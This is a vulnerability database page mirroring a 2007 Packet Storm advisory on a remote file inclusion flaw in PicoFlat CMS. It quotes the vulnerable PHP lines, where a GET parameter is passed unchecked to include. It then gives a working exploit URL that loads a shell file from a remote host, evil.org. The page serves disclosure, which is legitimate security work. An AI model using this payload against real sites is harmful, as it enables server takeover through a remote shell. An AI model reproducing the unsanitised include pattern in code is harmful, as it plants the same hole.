Lucene search

K

picoflat-rfi.txt

🗓️ 12 Oct 2007 00:00:00Reported by 0inType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

PicoFlat CMS remote file inclusion vulnerability in index.ph

Show more
Code
`#PicoFlat CMS Remote file inclusion  
#f0und bY 0in  
#download:http://sourceforge.net/project/showfiles.php?group_id=195156&package_id=230351&release_id=533796  
#Greetings to:Dark-coders team members: Die-angel,Slim,Umbro  
#Others: Joker186,Kaja,Wojto111,Rade0n  
#And funny n00b-firends: Pucik and Steryd ;]  
FUN BUG in index.php:  
83: if (isset($_GET['pagina'])) { $pagina = $_GET['pagina']; }else{ $pagina = "news_publisher.php"; }  
  
107: <?php include $pagina; ?>  
  
EXPLOIT:  
http://x.com/index.php?pagina=http://evil.org/shell.txt?  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
12 Oct 2007 00:00Current
7.4High risk
Vulners AI Score7.4
14
.json
Report